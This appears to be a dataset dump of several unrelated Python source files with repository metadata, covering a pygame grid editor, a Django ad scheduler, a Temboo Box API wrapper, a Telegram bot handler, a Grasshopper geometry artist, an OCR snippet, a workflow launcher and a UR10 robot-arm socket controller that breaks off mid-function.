if self.sidebar.load:
try:
np.save(self.grids_path + ".autosave.npy", self.grid)
self.grid = np.load(self.grids_path + self.sidebar.grid_name + ".npy")
self.sidebar.load = False
except:
pass
def _grid_controller(self, event:pygame.event) -> None:
"""The Grid Controller to zoom and move through the grid
Arguments:
event {event} -- A single event from pygame.event.get()
"""
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
self.relative_x_change = -5
elif event.key == pygame.K_RIGHT:
self.relative_x_change = 5
if event.key == pygame.K_DOWN:
self.relative_y_change = 5
elif event.key == pygame.K_UP:
self.relative_y_change = -5
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
self.relative_x_change = 0
if event.key == pygame.K_UP or event.key == pygame.K_DOWN:
self.relative_y_change = 0
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 4:
self.relatives_on_screen = min(max(10, self.relatives_on_screen + 6), self.grid.shape[0]*10)
elif event.button == 5:
self.relatives_on_screen = min(max(10, self.relatives_on_screen - 6), self.grid.shape[0]*10)
def _display_grid(self, gameDisplay:pygame.Surface) -> None: # TODO: make that only loops through the shown tiles and not checks every
"""Displays the grid on the gameDisplay
Arguments:
gameDisplay {pygame.Surface} -- The surface to display the grid on
"""
pixels_per_relative = self.display_height / self.relatives_on_screen
for x in range(self.grid.shape[0]):
for y in range(self.grid.shape[1]):
if self.relative_x <= x*10 <= self.relative_x + self.relatives_on_screen and self.relative_y <= y*10 <= self.relative_y + self.relatives_on_screen:
color = self.grid[x, y]
color = np.asarray(colorsys.hsv_to_rgb(color[0], color[1], color[2]))*255
pygame.draw.rect(gameDisplay, (int(color[0]), int(color[1]), int(color[2])), (x*10*pixels_per_relative - self.relative_x*pixels_per_relative, y*10*pixels_per_relative - self.relative_y*pixels_per_relative, pixels_per_relative*10, pixels_per_relative*10))
def _flood_fill(self, x:int, y:int, old_color:List[float], new_color:List[float]) -> None:
"""The 4flood fill algorithm
Arguments:
x {int} -- the x coordinate of the tile where the fill algo starts on
y {int} -- the y coordinate of the tile where the fill algo starts on
old_color {list} -- The old color of the grid tile in HSV
new_color {list} -- The new color with which the the flooded fields should be colored in HSV
"""
if list(self.grid[x, y]) == old_color:
self.grid[x,y] = new_color
self._flood_fill(x, min(self.grid.shape[1]-1, y+1), old_color, new_color)
self._flood_fill(x, max(0, y-1), old_color, new_color)
self._flood_fill(min(self.grid.shape[0]-1, x+1), y, old_color, new_color)
self._flood_fill(max(0, x-1), y, old_color, new_color)
| 142
| 9,016
| 23
|
69e1c7f030fdae6cc022477307bb6b668d3bc021
| 2,726
|
py
|
Python
|
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
api/Random_positions.py
|
TeaBreak-Tech/funtube_be
|
c244739fb4b9cced244cea4717bde3f09f8d86cf
|
[
"MIT"
] | null | null | null |
#import util_preparation as up
import pandas as pd
import random
import os
import csv
from .models import *
PREVENT_DURATION = 60
START_PREVENT_DURATION = 120
END_PREVENT_DURATION = 120
| 29.956044
| 100
| 0.573001
|
#import util_preparation as up
import pandas as pd
import random
import os
import csv
from .models import *
PREVENT_DURATION = 60
START_PREVENT_DURATION = 120
END_PREVENT_DURATION = 120
def generagte_random_ads(video_id,N_ADS=3):
# 确定插入的广告
# 可用广告在 ad_urls.csv 里查询
ads = []
ads = [[ad.ad_id, ad.href, ad.src] for ad in Ad.objects.all() if ad.ad_id != 1]
# reader = csv.reader(open(r"/home/www/res/ad/ad_urls.csv", "r",encoding="utf8"))
# for item in reader:
# ad_id = int(item[0])
# ad_url = item[1]
# ads.append([ad_id, ad_url])
# 随机取 N_ADS 个
ads = random.sample(ads, N_ADS)
# 确定插入时间
# 遍历全部_shot.csv,找到当前视频的对应 _shot.csv
available_times = []
available_local_shot_ids = []
for path,dir_list,file_list in os.walk(r"/home/www/res/video_shot_csv"):
for file_name in file_list:
id = int(file_name.split("/")[-1].split("_")[0].replace("video",""))
video = Video.objects.get(video_id=video_id)
v_length = video.length
shots:Shot = Shot.objects.filter(video=video)
for shot in shots:
#start_time = float(item[START_TIME_COL])
end_time = shot.end_time
# 每一个镜头的结束时间可以作为候选时间点
# 离开头和结尾过近(END_PREVENT_DURATION)的时间点自动剔除
if end_time > START_PREVENT_DURATION and end_time < v_length - END_PREVENT_DURATION:
available_times.append(end_time)
available_local_shot_ids.append(shot.local_shot_id)
def randomize_time():
ad_times = random.sample(available_times, N_ADS)
ad_times.sort()
for i in range(0,N_ADS):
if (i-1)>0:
if abs(ad_times[i] - ad_times[i-1]) < PREVENT_DURATION:
ad_times = randomize_time()
break
if (i+1)<len(ad_times):
if abs(ad_times[i] - ad_times[i+1]) < PREVENT_DURATION:
ad_times = randomize_time()
break
return ad_times
if len(available_times) > N_ADS:
ad_times = randomize_time()
#print(ad_times)
else:
#print("ERROR: len(available_times) <= N_ADS")
return []
local_shot_ids = []
for time in ad_times:
local_shot_ids.append(available_local_shot_ids[available_times.index(time)])
# print(ad_times)
result = []
for i in range(0, N_ADS):
result.append({
"ad_id":ads[i][0],
"time":ad_times[i],
"local_shot_id":local_shot_ids[i],
"href":ads[i][1],
"src":ads[i][2]
})
#print(result)
return result
| 2,662
| 0
| 23
|
5f7d6c5925fe4e52b86831fe3e20e0cbb51570a3
| 4,646
|
py
|
Python
|
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Box/Files/ZipFile.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ZipFile
# Creates a zipped version of the specified Box file and returns a link to the new compressed file.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ZipFileInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ZipFile
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
super(ZipFileInputSet, self)._set_input('AccessToken', value)
def set_AsUser(self, value):
"""
Set the value of the AsUser input for this Choreo. ((optional, string) The ID of the user. Only used for enterprise administrators to make API calls for their managed users.)
"""
super(ZipFileInputSet, self)._set_input('AsUser', value)
def set_FileID(self, value):
"""
Set the value of the FileID input for this Choreo. ((required, string) The id of the file to zip.)
"""
super(ZipFileInputSet, self)._set_input('FileID', value)
def set_SharedLink(self, value):
"""
Set the value of the SharedLink input for this Choreo. ((conditional, json) A JSON object representing the item?s shared link and associated permissions. See documentation for formatting examples.)
"""
super(ZipFileInputSet, self)._set_input('SharedLink', value)
def set_ZipFileLocation(self, value):
"""
Set the value of the ZipFileLocation input for this Choreo. ((conditional, string) The id of the folder to put the new zip file in. When not specified, the zip file will be put in the root folder.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileLocation', value)
def set_ZipFileName(self, value):
"""
Set the value of the ZipFileName input for this Choreo. ((required, string) The name of the zip file that will be created.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileName', value)
class ZipFileResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ZipFile Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((string) The response from Box. This contains the newly created zip file metadata.)
"""
return self._output.get('Response', None)
def get_URL(self):
"""
Retrieve the value for the "URL" output from this Choreo execution. ((string) The url for the newly created zip file.)
"""
return self._output.get('URL', None)
| 40.754386
| 206
| 0.674774
|
# -*- coding: utf-8 -*-
###############################################################################
#
# ZipFile
# Creates a zipped version of the specified Box file and returns a link to the new compressed file.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ZipFile(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ZipFile Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ZipFile, self).__init__(temboo_session, '/Library/Box/Files/ZipFile')
def new_input_set(self):
return ZipFileInputSet()
def _make_result_set(self, result, path):
return ZipFileResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ZipFileChoreographyExecution(session, exec_id, path)
class ZipFileInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ZipFile
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
super(ZipFileInputSet, self)._set_input('AccessToken', value)
def set_AsUser(self, value):
"""
Set the value of the AsUser input for this Choreo. ((optional, string) The ID of the user. Only used for enterprise administrators to make API calls for their managed users.)
"""
super(ZipFileInputSet, self)._set_input('AsUser', value)
def set_FileID(self, value):
"""
Set the value of the FileID input for this Choreo. ((required, string) The id of the file to zip.)
"""
super(ZipFileInputSet, self)._set_input('FileID', value)
def set_SharedLink(self, value):
"""
Set the value of the SharedLink input for this Choreo. ((conditional, json) A JSON object representing the item?s shared link and associated permissions. See documentation for formatting examples.)
"""
super(ZipFileInputSet, self)._set_input('SharedLink', value)
def set_ZipFileLocation(self, value):
"""
Set the value of the ZipFileLocation input for this Choreo. ((conditional, string) The id of the folder to put the new zip file in. When not specified, the zip file will be put in the root folder.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileLocation', value)
def set_ZipFileName(self, value):
"""
Set the value of the ZipFileName input for this Choreo. ((required, string) The name of the zip file that will be created.)
"""
super(ZipFileInputSet, self)._set_input('ZipFileName', value)
class ZipFileResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ZipFile Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((string) The response from Box. This contains the newly created zip file metadata.)
"""
return self._output.get('Response', None)
def get_URL(self):
"""
Retrieve the value for the "URL" output from this Choreo execution. ((string) The url for the newly created zip file.)
"""
return self._output.get('URL', None)
class ZipFileChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ZipFileResultSet(response, path)
| 312
| 424
| 100
|
2374e49774cc023c7ed6620b6560ab93b1236fd8
| 1,009
|
py
|
Python
|
telegram_addons/conversationhandlerext.py
|
LaFa777/python-telegram-bot-addons
|
55c48ada4c83df2b2ec75f00e819f8928149f8cd
|
[
"Apache-2.0"
] | null | null | null |
telegram_addons/conversationhandlerext.py
|
LaFa777/python-telegram-bot-addons
|
55c48ada4c83df2b2ec75f00e819f8928149f8cd
|
[
"Apache-2.0"
] | null | null | null |
telegram_addons/conversationhandlerext.py
|
LaFa777/python-telegram-bot-addons
|
55c48ada4c83df2b2ec75f00e819f8928149f8cd
|
[
"Apache-2.0"
] | null | null | null |
from telegram.ext import ConversationHandler
class ConversationHandlerExt(ConversationHandler):
"""Расширяет оригинальный :class:`telegram.ext.ConversationHandler` возможностью вручную
установить `state`. Переопределяет конструктор, теперь обязателен только 1 параметр (states).
"""
def set_state(self, update, state):
"""Устанавливает переданный state.
"""
# проверяем, что переданный state возможен
if state not in self.states.keys() and state != self.END:
raise ValueError(
"state=\"{}\" not exist in current ConversationHandlerExt".format(state))
key = self._get_key(update)
self.update_state(state, key)
| 32.548387
| 97
| 0.622398
|
from telegram.ext import ConversationHandler
class ConversationHandlerExt(ConversationHandler):
"""Расширяет оригинальный :class:`telegram.ext.ConversationHandler` возможностью вручную
установить `state`. Переопределяет конструктор, теперь обязателен только 1 параметр (states).
"""
def __init__(self,
states,
**kwargs):
if 'entry_points' not in kwargs:
kwargs["entry_points"] = []
if 'fallbacks' not in kwargs:
kwargs["fallbacks"] = []
kwargs["states"] = states
super().__init__(**kwargs)
def set_state(self, update, state):
"""Устанавливает переданный state.
"""
# проверяем, что переданный state возможен
if state not in self.states.keys() and state != self.END:
raise ValueError(
"state=\"{}\" not exist in current ConversationHandlerExt".format(state))
key = self._get_key(update)
self.update_state(state, key)
| 277
| 0
| 27
|
68408fe7a5c1690df451641f4565f48305c8e19c
| 830
|
py
|
Python
|
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
src/compas_ghpython/artists/pointartist.py
|
GeneKao/compas
|
eb6b5dc928236477d5d0fa1561e26dda6296f019
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_ghpython
from compas.artists import PrimitiveArtist
from .artist import GHArtist
class PointArtist(GHArtist, PrimitiveArtist):
"""Artist for drawing points.
Parameters
----------
point : :class:`compas.geometry.Point`
A COMPAS point.
"""
def draw(self):
"""Draw the point.
Returns
-------
:class:`Rhino.Geometry.Point3d`
"""
points = [self._get_args(self.primitive)]
return compas_ghpython.draw_points(points)[0]
@staticmethod
| 23.714286
| 68
| 0.659036
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas_ghpython
from compas.artists import PrimitiveArtist
from .artist import GHArtist
class PointArtist(GHArtist, PrimitiveArtist):
"""Artist for drawing points.
Parameters
----------
point : :class:`compas.geometry.Point`
A COMPAS point.
"""
def __init__(self, point, **kwargs):
super(PointArtist, self).__init__(primitive=point, **kwargs)
def draw(self):
"""Draw the point.
Returns
-------
:class:`Rhino.Geometry.Point3d`
"""
points = [self._get_args(self.primitive)]
return compas_ghpython.draw_points(points)[0]
@staticmethod
def _get_args(primitive):
return {'pos': list(primitive)}
| 128
| 0
| 53
|
9ec102cb665e7539c5fa44c0ec648ab7542b5df8
| 167
|
py
|
Python
|
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
imagetext.py
|
downthecrop/python-text-from-image
|
d4c79e38ad7a938c17ad94554a5d5dad59991930
|
[
"BSD-2-Clause"
] | null | null | null |
##Requires PIL (Pillow), and pytesseract
from PIL import Image
from pytesseract import image_to_string
img=Image.open('test.png')
print(image_to_string(img))
| 20.875
| 41
| 0.760479
|
##Requires PIL (Pillow), and pytesseract
from PIL import Image
from pytesseract import image_to_string
img=Image.open('test.png')
print(image_to_string(img))
| 0
| 0
| 0
|
ba109537d1c09b462c5c8821fa653a5b7cfb8c0a
| 2,744
|
py
|
Python
|
covid19-etl/etl/bayes_model_workflow.py
|
West-Loop-Strategy/covid19-tools
|
a8f30c97fbc5d4e775003fea95cb57f5df88332a
|
[
"Apache-2.0"
] | null | null | null |
covid19-etl/etl/bayes_model_workflow.py
|
West-Loop-Strategy/covid19-tools
|
a8f30c97fbc5d4e775003fea95cb57f5df88332a
|
[
"Apache-2.0"
] | null | null | null |
covid19-etl/etl/bayes_model_workflow.py
|
West-Loop-Strategy/covid19-tools
|
a8f30c97fbc5d4e775003fea95cb57f5df88332a
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime
import requests
import time
from etl import base
from utils.fence_helper import get_api_key, get_access_token
| 39.768116
| 114
| 0.622449
|
from datetime import datetime
import requests
import time
from etl import base
from utils.fence_helper import get_api_key, get_access_token
class BAYES_MODEL_WORKFLOW(base.BaseETL):
def __init__(self, base_url, access_token, s3_bucket):
super().__init__(base_url, access_token, s3_bucket)
self.headers = {"Authorization": f"Bearer {access_token}"}
self.api_key = None
self.model_version = "v3.2"
self.status_ping_minutes = 10
def get_status(self, run_id):
url = f"{self.base_url}/ga4gh/wes/v1/runs/{run_id}/status"
r = requests.get(url, headers=self.headers)
if r.status_code == 403:
print(
"Got a 403, token might have expired. Getting a new token and retrying"
)
new_access_token = get_access_token(self.base_url, self.api_key)
self.headers = {"Authorization": f"Bearer {new_access_token}"}
r = requests.get(url, headers=self.headers)
assert (
r.status_code == 200
), f"Could not get run status from Mariner ({r.status_code}):\n{r.text}"
resp_data = r.json()
if not resp_data or "status" not in resp_data:
# Mariner did not return a status - that happens right after the
# job is created. It might take a few seconds to start the run.
# For now, assume the status is "not-started"
return "not-started"
return resp_data["status"]
def files_to_submissions(self):
self.api_key = get_api_key(base_url, headers=self.headers)
print("Preparing request body")
url = f"https://raw.githubusercontent.com/uc-cdis/covid19model/{self.model_version}/cwl/request_body.json"
r = requests.get(url)
assert r.status_code == 200, f"Could not get request body from {url}"
request_body = r.json()
request_body["input"]["s3_bucket"] = f"s3://{self.s3_bucket}"
print("Starting workflow run")
url = f"{self.base_url}/ga4gh/wes/v1/runs"
r = requests.post(url, json=request_body, headers=self.headers)
assert (
r.status_code == 200
), f"Could not start Mariner workflow ({r.status_code}):\n{r.text}"
resp_data = r.json()
assert (
resp_data and "runID" in resp_data
), f"Mariner did not return a runID:\n{resp_data}"
run_id = resp_data["runID"]
print(f"Monitoring workflow run (run ID: {run_id})")
status = "running"
while status in ["not-started", "running", "unknown"]:
status = self.get_status(run_id)
print(f" [{datetime.now()}] status: {status}")
time.sleep(60 * self.status_ping_minutes)
| 2,479
| 20
| 103
|
5e646af002eec7affa6c340d69f3649382ec6a9a
| 17,625
|
py
|
Python
|
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
shape_recognition/libraries/UR10/UR10.py
|
ys1998/tactile-shape-recognition
|
b5ab6f1cdf04ff23e14b467a590533e7ee740b52
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
# NATIONAL UNIVERSITY OF SINGAPORE - NUS
# SINGAPORE INSTITUTE FOR NEUROTECHNOLOGY - SINAPSE
# Singapore
# URL: http://www.sinapseinstitute.org
#-------------------------------------------------------------------------------
# Neuromorphic Engineering Group
# Author: Rohan Ghosh, MSc
# Contact:
#-------------------------------------------------------------------------------
# Description: UR10 controller in python
#-------------------------------------------------------------------------------
'''
#-------------------------------------------------------------------------------
import socket
import numpy as np
from ur10_simulation import ur10_simulator
import time
import struct
import binascii
from copy import copy
import os.path
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
#class for managing UR10 poses and
#MANAGING POSES (POSITIONS OR JOINTS)
#save pose file
#filename should contain the full path for the file
#load pose file
#filename should contain the full path for the file
#move the UR robot to the specified pose
#get pose names
#get the joint position
#adding a new position
#WARNING: Adding a new position with the same name will overwrite any
#previous entry
#WARNING: position should be in m!!
#WARNING: joints should be in radians!!
#adding a new joint
#WARNING: Adding a new joint with the same name will overwrite any
#previous entry
#WARNING: joints should be in radians!!
#removing a position/joint
#this function remaps all the positions that have been saved to a new
#home position. necessary when remapping has changed. as long as it is
#possible to create positions relative to an origin or home position, this
#method can be used to convert all the stored positions to new values
#based on a new origin
#def conv2newHome(self,_home):
# print('ok')
#-------------------------------------------------------------------------------
if __name__ == '__main__':
port = 30003
ip1 = '10.1.1.6'
# ip2 = '10.1.1.6'
import os,sys
sys.path.append('../iLimb')
from iLimb import *
buffer_size = 1024
U1 = UR10Controller(ip1)
# U2 = UR10Controller(ip2)
# U1.read_joints()
# print(U1.joints)
# U1.read_joints()
# Sim = ur10_simulator()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# print(U1.xyzR)
# new_joints = copy(U1.joints)
mult = 1
Sim = ur10_simulator()
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(40, 190,"z",3,-20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,-20)
# time.sleep(3)
# for i in range(100):
# t1 = time.time()
# # U1.read_joints()
# U1.read_xyz()
# print(time.time() - t1)
# print(U1.joints)
# # time.sleep(5)
# print(U1.xyzR)
#rpy_change = np.deg2rad([0, -10, 0])
# l = iLimbController('COM16')
# l.connect()
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
angle = -10
dist_pivot = 220
grasp_pivot = 25
# #open the fingers
# for i in range(6):
# #new_xyzR = U1.move_rpy_with_constraints(rpy_change, 175)
# #U1.movej(new_xyzR,2)
# # l.control(['thumb','index','middle'],['position']*3,[140,120,120])
# U1.read_joints()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# old_xyzR = copy(U1.xyzR)
# print(U1.xyzR)
# new_joints = copy(U1.joints)
# new_joints[4] = new_joints[4] + angle
# new_xyzR = U1.move_joints_with_grasp_constraints(new_joints,dist_pivot,grasp_pivot,"z")
# U1.movej(new_xyzR,3)
# time.sleep(3.2)
#close the fingers
# #Bimanual
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
# time.sleep(1)
# U1.movej(old_xyzR,3)
# print(mult, new_joints)
# old_XYZ = copy(U1.xyzR)
# # U2.read_xyz()
# print(U1.xyzR)
# print(old_XYZ)
# # Sim.tcp_vec = U1.xyzR
# mult = 1
# seconds = 2
# for i in range(100):
# Sim.tcp_vec = Sim.position_along_endaxis(-30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# Sim.tcp_vec = Sim.position_along_endaxis(30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# print(Sim.tcp_vec)
# # print(U2.xyzR)
# mult = 1
# for i in range(100):
# U1.xyzR[0] = U1.xyzR[0] + (20*mult)
# # U2.xyzR[0] = U2.xyzR[0] + (20*mult)
# U1.movej(U1.xyzR,1)
# # pause(0.05)
# # U2.movej(U2.xyzR,0.4)
# time.sleep(1)
# mult = mult*(-1)
# print("Joints from port", U.joints)
# Sim.set_joints(U.joints)
# Sim.tcp_vec = Sim.joints2pose()
| 31.756757
| 198
| 0.549787
|
# -*- coding: utf-8 -*-
'''
#-------------------------------------------------------------------------------
# NATIONAL UNIVERSITY OF SINGAPORE - NUS
# SINGAPORE INSTITUTE FOR NEUROTECHNOLOGY - SINAPSE
# Singapore
# URL: http://www.sinapseinstitute.org
#-------------------------------------------------------------------------------
# Neuromorphic Engineering Group
# Author: Rohan Ghosh, MSc
# Contact:
#-------------------------------------------------------------------------------
# Description: UR10 controller in python
#-------------------------------------------------------------------------------
'''
#-------------------------------------------------------------------------------
import socket
import numpy as np
from ur10_simulation import ur10_simulator
import time
import struct
import binascii
from copy import copy
import os.path
#-------------------------------------------------------------------------------
class UR10Controller:
def __init__(self, ip,port_recv = 30003, port_send=30002, buffer_size=1024):
self.port_send = port_send
self.port_recv = port_recv
self.ip = ip
self.buffer_size = buffer_size
self.joints = np.zeros((6))
self.xyzR = np.zeros((6))
self.timer_start = time.time()
self.connect()
self.read_start = copy(self.read_time())
self.read_timer = 0
def connect(self):
self.urcont_send = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.urcont_recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.urcont_send.connect((self.ip,self.port_send))
self.urcont_recv.connect((self.ip,self.port_recv))
def disconnect(self):
self.urcont_send.close()
def read_time(self):
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
packet_3 = self.urcont_recv.recv(1048)
Time = self.get_xyzR(packet_2)
return Time
def movej(self,posevec,t):
X = 0.001*posevec[0]
Y = 0.001*posevec[1]
Z = 0.001*posevec[2]
Rx = posevec[3]
Ry = posevec[4]
Rz = posevec[5]
cmd = "movej(p[" + str(X) + "," + str(Y) + "," + str(Z) + "," + str(Rx) + "," + str(Ry) + "," + str(Rz) + "], t =" + str(t) + ")\n"
# print(cmd)
# a = input("")
cmd = bytes(cmd, 'utf-8')
self.urcont_send.send(cmd)
def movejoint(self,jointvec,t):
cmd = "movej([" + str(jointvec[0]) + "," + str(jointvec[1]) + "," + str(jointvec[2]) + "," + str(jointvec[3]) + "," + str(jointvec[4]) + "," + str(jointvec[5]) + "], t =" + str(t) + ") \n"
cmd = bytes(cmd, 'utf-8')
self.urcont_send.send(cmd)
def stopj(self,a = 2):
cmd = "stopj(" + str(a) + ")"
self.urcont_send.send(cmd)
def clear_buffer(self):
#t1 = time.time()
self.timer_current = copy(time.time()) - self.timer_start
t1 = time.time()
while 1:
time.sleep(0.00001)
T = self.read_time()
self.read_timer = T - self.read_start
if self.timer_current - self.read_timer <0.05:
break
#t2 = time.time() - t1
def read_xyz(self):
#time.sleep(0.05)
self.clear_buffer()
#time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
self.read_timer = self.get_xyzR(packet_2) - self.read_start
self.timer_current = time.time() - self.timer_start
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
packet_8 = self.urcont_recv.recv(48)
packet_9 = self.urcont_recv.recv(48)
packet_10 = self.urcont_recv.recv(48)
packet_11 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
if i<3:
self.xyzR[i] = self.get_xyzR(packet)*1000
else:
self.xyzR[i] = self.get_xyzR(packet)
useless = self.urcont_recv.recv(568)
def get_joint(self,packet):
#x = packet[0:8].encode("hex")
#x = binascii.hexlify(packet[0:8].encode('utf8'))
x = packet[0:8].hex()
y = str(x)
y = struct.unpack('!d', bytes.fromhex(y))[0]
val = y * (180.0/3.1419)
return val
def get_xyzR(self,packet):
#x = packet[0:8].encode("hex")
#x = binascii.hexlify(packet[0:8].encode('utf8'))
x = packet[0:8].hex()
y = str(x)
y = struct.unpack('!d', bytes.fromhex(y))[0]
val = y
return val
def read_joints(self):
t1 = time.time()
self.clear_buffer()
print("Time to learn",time.time() - t1)
#time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
self.read_timer = self.get_xyzR(packet_2) - self.read_start
self.timer_current = time.time() - self.timer_start
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
self.joints[i] = self.get_joint(packet)
useless = self.urcont_recv.recv(760)
def read_joints_and_xyzR(self):
self.clear_buffer()
# time.sleep(0.05)
packet_1 = self.urcont_recv.recv(4)
packet_2 = self.urcont_recv.recv(8)
packet_3 = self.urcont_recv.recv(48)
packet_4 = self.urcont_recv.recv(48)
packet_5 = self.urcont_recv.recv(48)
packet_6 = self.urcont_recv.recv(48)
packet_7 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
self.joints[i] = self.get_joint(packet)
packet_9 = self.urcont_recv.recv(48)
packet_10 = self.urcont_recv.recv(48)
packet_11 = self.urcont_recv.recv(48)
for i in range(6):
packet = self.urcont_recv.recv(8)
if i < 3:
self.xyzR[i] = self.get_xyzR(packet)*1000
else:
self.xyzR[i] = self.get_xyzR(packet)
useless = self.urcont_recv.recv(568)
def move_joint_with_constraints(self, joints_vec, dist_pivot):
#joints_vec is in degrees
# self.read_joints_and_xyzR()
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
# print(pivot_curr)
S1.set_joints(joints_vec)
S1.tcp_vec = copy(S1.joints2pose())
pivot_new,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
